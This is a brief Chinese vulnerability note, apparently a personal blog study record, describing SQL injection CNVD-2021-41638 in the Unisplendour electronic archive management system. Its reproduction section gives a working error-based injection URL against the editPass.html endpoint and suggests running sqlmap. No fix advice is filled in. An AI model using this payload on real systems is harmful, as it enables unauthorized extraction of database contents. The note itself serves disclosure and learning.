紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638

  • Post author:
  • Post category:其他




漏洞描述:

紫光软件系统有限公司(以下简称“紫光软件”)是中国领先的行业解决方案和IT服务提供商。 紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。



漏洞利用条件:

/



漏洞影响范围:

紫光电子档案管理系统



漏洞复现:

1.Poc:/login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1)))

2.sqlmap跑注入



修复建议:

/

学习记录过程仅供参考!!!



版权声明:本文为weixin_46801402原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。